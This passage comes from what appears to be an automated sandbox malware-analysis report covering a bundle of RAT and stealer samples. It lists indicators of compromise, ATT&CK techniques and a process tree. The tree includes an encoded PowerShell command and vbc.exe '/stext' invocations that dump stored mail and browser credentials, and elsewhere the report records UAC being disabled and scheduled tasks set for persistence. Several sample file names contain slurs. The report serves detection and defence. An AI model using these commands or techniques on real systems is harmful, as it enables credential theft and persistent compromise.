File created	C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config	AgentTesla.exe
File created	C:\PROGRA~3\Hdlharas\dlrarhsiva.exe	CrimsonRAT.exe
File opened for modification	C:\PROGRA~3\Hdlharas\dlrarhsiva.exe	CrimsonRAT.exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.xml	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.xml	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\VDFParser.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\SharpSteam.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.dll	AgentTesla.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\psychosomaticDLL.dll	psychosomatic.RAT.exe
File opened for modification	C:\Windows\SYSTEM.INI	LoveForyou.scr

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
8544	sc.exe
8604	sc.exe
9068	sc.exe
3876	sc.exe
4948	sc.exe
2636	sc.exe
7004	sc.exe
8352	sc.exe
3372	sc.exe
6264	sc.exe
4572	sc.exe
8236	sc.exe
1016	sc.exe
8392	sc.exe
5244	sc.exe
8944	sc.exe
6188	sc.exe
8484	sc.exe
5052	sc.exe
3268	sc.exe
5304	sc.exe
8152	sc.exe
6248	sc.exe
6572	sc.exe
6208	sc.exe
7704	sc.exe
1340	sc.exe
6844	sc.exe
3836	sc.exe
3220	sc.exe
8708	sc.exe
7996	sc.exe
2648	sc.exe
3816	sc.exe
8860	sc.exe
6484	sc.exe
6992	sc.exe
808	sc.exe
8704	sc.exe
4840	sc.exe
5904	sc.exe
6684	sc.exe
1652	sc.exe
2012	sc.exe
8620	sc.exe
944	sc.exe
5972	sc.exe
5732	sc.exe
5756	sc.exe
8116	sc.exe
3512	sc.exe
7036	sc.exe
3716	sc.exe
3920	sc.exe
6660	sc.exe
6732	sc.exe
6232	sc.exe
6004	sc.exe
6216	sc.exe
6824	sc.exe
6912	sc.exe
9160	sc.exe
3740	sc.exe
752	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000500000001946b-335.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
2376	2744	WerFault.exe	56
1624	2204	WerFault.exe	90
5160	3212	WerFault.exe	97
5592	3948	WerFault.exe	163
8316	6452	WerFault.exe	243

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amadey.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DanaBot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EliteMonitor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord Nitro Checker by Unheilgott (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lokibot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2020.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2020.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LoveForyou.scr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bween.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0a-PORNOSKI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nigga.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AgentTesla.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 10 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3208	PING.EXE
7604	PING.EXE
6424	PING.EXE
408	PING.EXE
3196	PING.EXE
5576	PING.EXE
9120	PING.EXE
8116	PING.EXE
7732	PING.EXE
2720	PING.EXE

Delays execution with timeout.exe 7 IoCs

defense_evasion

pid	Process
3904	timeout.exe
5952	timeout.exe
6240	timeout.exe
8468	timeout.exe
5356	timeout.exe
5336	timeout.exe
8984	timeout.exe

Kills process with taskkill 10 IoCs

defense_evasion

pid	Process
3752	taskkill.exe
5968	taskkill.exe
9112	taskkill.exe
9064	taskkill.exe
5960	taskkill.exe
8356	taskkill.exe
8992	taskkill.exe
7212	taskkill.exe
8588	taskkill.exe
4400	taskkill.exe

Modifies data under HKEY_USERS 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\MediaProperties	psychosomatic.RAT.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick	psychosomatic.RAT.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm	psychosomatic.RAT.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet	psychosomatic.RAT.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control	psychosomatic.RAT.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\MediaProperties\PrivateProperties	psychosomatic.RAT.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm\wheel = "1"	psychosomatic.RAT.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Direct3D\MostRecentApplication	psychosomatic.RAT.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Direct3D\MostRecentApplication\Name = "psychosomatic.RAT.exe"	psychosomatic.RAT.exe
Key created	\REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm	psychosomatic.RAT.exe
Key created	\REGISTRY\USER\.DEFAULT\System	psychosomatic.RAT.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
2216	reg.exe
6096	reg.exe
5608	reg.exe

Runs ping.exe 1 TTPs 10 IoCs

Remote System Discovery

T1018

pid	Process
6424	PING.EXE
408	PING.EXE
3196	PING.EXE
7604	PING.EXE
8116	PING.EXE
7732	PING.EXE
2720	PING.EXE
3208	PING.EXE
5576	PING.EXE
9120	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 25 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
7796	schtasks.exe
5712	schtasks.exe
3344	schtasks.exe
8936	schtasks.exe
8504	schtasks.exe
5932	schtasks.exe
4600	schtasks.exe
7088	schtasks.exe
3576	schtasks.exe
376	schtasks.exe
6180	schtasks.exe
8756	schtasks.exe
7116	schtasks.exe
4332	schtasks.exe
7472	schtasks.exe
5136	schtasks.exe
7500	schtasks.exe
4992	schtasks.exe
6308	schtasks.exe
5832	schtasks.exe
7712	schtasks.exe
1540	schtasks.exe
8784	schtasks.exe
3820	schtasks.exe
4828	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1800	powershell.exe
896	2020.exe
896	2020.exe
896	2020.exe
896	2020.exe
896	2020.exe
896	2020.exe
3040	psychosomatic.RAT.exe
3040	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
992	LoveForyou.scr
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe
2980	psychosomatic.RAT.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	1028	1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
Token: SeDebugPrivilege	896	2020.exe
Token: SeDebugPrivilege	2084	_[MyFamilyPies]Avi.exe
Token: SeDebugPrivilege	808	Discord Nitro Generator and Checker.exe
Token: SeDebugPrivilege	3040	psychosomatic.RAT.exe
Token: 1	2980	psychosomatic.RAT.exe
Token: SeCreateTokenPrivilege	2980	psychosomatic.RAT.exe
Token: SeAssignPrimaryTokenPrivilege	2980	psychosomatic.RAT.exe
Token: SeLockMemoryPrivilege	2980	psychosomatic.RAT.exe
Token: SeIncreaseQuotaPrivilege	2980	psychosomatic.RAT.exe
Token: SeMachineAccountPrivilege	2980	psychosomatic.RAT.exe
Token: SeTcbPrivilege	2980	psychosomatic.RAT.exe
Token: SeSecurityPrivilege	2980	psychosomatic.RAT.exe
Token: SeTakeOwnershipPrivilege	2980	psychosomatic.RAT.exe
Token: SeLoadDriverPrivilege	2980	psychosomatic.RAT.exe
Token: SeSystemProfilePrivilege	2980	psychosomatic.RAT.exe
Token: SeSystemtimePrivilege	2980	psychosomatic.RAT.exe
Token: SeProfSingleProcessPrivilege	2980	psychosomatic.RAT.exe
Token: SeIncBasePriorityPrivilege	2980	psychosomatic.RAT.exe
Token: SeCreatePagefilePrivilege	2980	psychosomatic.RAT.exe
Token: SeCreatePermanentPrivilege	2980	psychosomatic.RAT.exe
Token: SeBackupPrivilege	2980	psychosomatic.RAT.exe
Token: SeRestorePrivilege	2980	psychosomatic.RAT.exe
Token: SeShutdownPrivilege	2980	psychosomatic.RAT.exe
Token: SeDebugPrivilege	2980	psychosomatic.RAT.exe
Token: SeAuditPrivilege	2980	psychosomatic.RAT.exe
Token: SeSystemEnvironmentPrivilege	2980	psychosomatic.RAT.exe
Token: SeChangeNotifyPrivilege	2980	psychosomatic.RAT.exe
Token: SeRemoteShutdownPrivilege	2980	psychosomatic.RAT.exe
Token: SeUndockPrivilege	2980	psychosomatic.RAT.exe
Token: SeSyncAgentPrivilege	2980	psychosomatic.RAT.exe
Token: SeEnableDelegationPrivilege	2980	psychosomatic.RAT.exe
Token: SeManageVolumePrivilege	2980	psychosomatic.RAT.exe
Token: SeImpersonatePrivilege	2980	psychosomatic.RAT.exe
Token: SeCreateGlobalPrivilege	2980	psychosomatic.RAT.exe
Token: 31	2980	psychosomatic.RAT.exe
Token: 32	2980	psychosomatic.RAT.exe
Token: 33	2980	psychosomatic.RAT.exe
Token: 34	2980	psychosomatic.RAT.exe
Token: 35	2980	psychosomatic.RAT.exe
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: 35	2080	DISCORD BIRTHDAY NITRO CLAIMER.exe
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr
Token: SeDebugPrivilege	992	LoveForyou.scr

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2936	0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1792 wrote to memory of 1800	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	31
PID 1792 wrote to memory of 1800	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	31
PID 1792 wrote to memory of 1800	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	31
PID 1792 wrote to memory of 1800	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	31
PID 1792 wrote to memory of 2084	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	33
PID 1792 wrote to memory of 2084	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	33
PID 1792 wrote to memory of 2084	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	33
PID 1792 wrote to memory of 2084	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	33
PID 1792 wrote to memory of 2212	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	34
PID 1792 wrote to memory of 2212	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	34
PID 1792 wrote to memory of 2212	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	34
PID 1792 wrote to memory of 2212	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	34
PID 1792 wrote to memory of 2660	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	35
PID 1792 wrote to memory of 2660	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	35
PID 1792 wrote to memory of 2660	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	35
PID 1792 wrote to memory of 2660	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	35
PID 1792 wrote to memory of 2564	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	36
PID 1792 wrote to memory of 2564	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	36
PID 1792 wrote to memory of 2564	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	36
PID 1792 wrote to memory of 2564	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	36
PID 2564 wrote to memory of 2996	2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	37
PID 2564 wrote to memory of 2996	2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	37
PID 2564 wrote to memory of 2996	2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	37
PID 2564 wrote to memory of 2996	2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	37
PID 2564 wrote to memory of 616	2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	39
PID 2564 wrote to memory of 616	2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	39
PID 2564 wrote to memory of 616	2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	39
PID 2564 wrote to memory of 616	2564	0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe	39
PID 1792 wrote to memory of 1028	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	38
PID 1792 wrote to memory of 1028	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	38
PID 1792 wrote to memory of 1028	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	38
PID 1792 wrote to memory of 1028	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	38
PID 1792 wrote to memory of 2016	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	40
PID 1792 wrote to memory of 2016	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	40
PID 1792 wrote to memory of 2016	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	40
PID 1792 wrote to memory of 2016	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	40
PID 1792 wrote to memory of 1488	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	41
PID 1792 wrote to memory of 1488	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	41
PID 1792 wrote to memory of 1488	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	41
PID 1792 wrote to memory of 1488	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	41
PID 1792 wrote to memory of 1488	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	41
PID 1792 wrote to memory of 1488	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	41
PID 1792 wrote to memory of 1488	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	41
PID 1792 wrote to memory of 1964	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	42
PID 1792 wrote to memory of 1964	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	42
PID 1792 wrote to memory of 1964	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	42
PID 1792 wrote to memory of 1964	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	42
PID 1792 wrote to memory of 808	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	43
PID 1792 wrote to memory of 808	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	43
PID 1792 wrote to memory of 808	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	43
PID 1792 wrote to memory of 808	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	43
PID 1792 wrote to memory of 896	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	45
PID 1792 wrote to memory of 896	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	45
PID 1792 wrote to memory of 896	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	45
PID 1792 wrote to memory of 896	1792	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	45
PID 896 wrote to memory of 2124	896	2020.exe	79
PID 896 wrote to memory of 2124	896	2020.exe	79
PID 896 wrote to memory of 2124	896	2020.exe	79
PID 896 wrote to memory of 2124	896	2020.exe	79
PID 896 wrote to memory of 2864	896	2020.exe	47
PID 896 wrote to memory of 2864	896	2020.exe	47
PID 896 wrote to memory of 2864	896	2020.exe	47
PID 896 wrote to memory of 2864	896	2020.exe	47
PID 896 wrote to memory of 2716	896	2020.exe	48

System policy modification 1 TTPs 1 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LoveForyou.scr

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5560	attrib.exe
3592	attrib.exe
3484	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	DevilRAT.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	DevilRAT.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492
- C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
  C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe C:\Users\Admin 0
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2980

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
PID:1116

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1160

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1208
- C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
  "C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1792
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZgBxACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAYgByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABpAGQAIAB5AG8AdQAgAGsAbgBvAHcAIAB5AG8AdQAnACcAcgBlACAAZgB1AGMAawBlAGQAIAB3AGkAdABoACAAYQAgAHMAaABpAHQAIAB0AG8AbgAgAG8AZgAgAFIAQQBUACAAZgBhAG0AaQBsAGkAZQBzAD8AIABPAGgAIAB3AGUAbABsACwAIABlAG4AagBvAHkAIAB0AGgAZQAgAG0AYQB5AGgAZQBtACEAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHUAdQBxACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1800
- - C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe
    "C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:2084
  - - C:\Users\Admin\AppData\Roaming\Installer.exe
      "C:\Users\Admin\AppData\Roaming\Installer.exe"
      4⤵
      Executes dropped EXE
      PID:3756
- - C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
    "C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2212
  - - C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
      "C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
      4⤵
      PID:3340
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
        5⤵
        
        PID:2128
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
        5⤵
        
        PID:8532
- - C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe
    "C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops autorun.inf file
    - System Location Discovery: System Language Discovery
    PID:2660
- - C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
    "C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2564
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
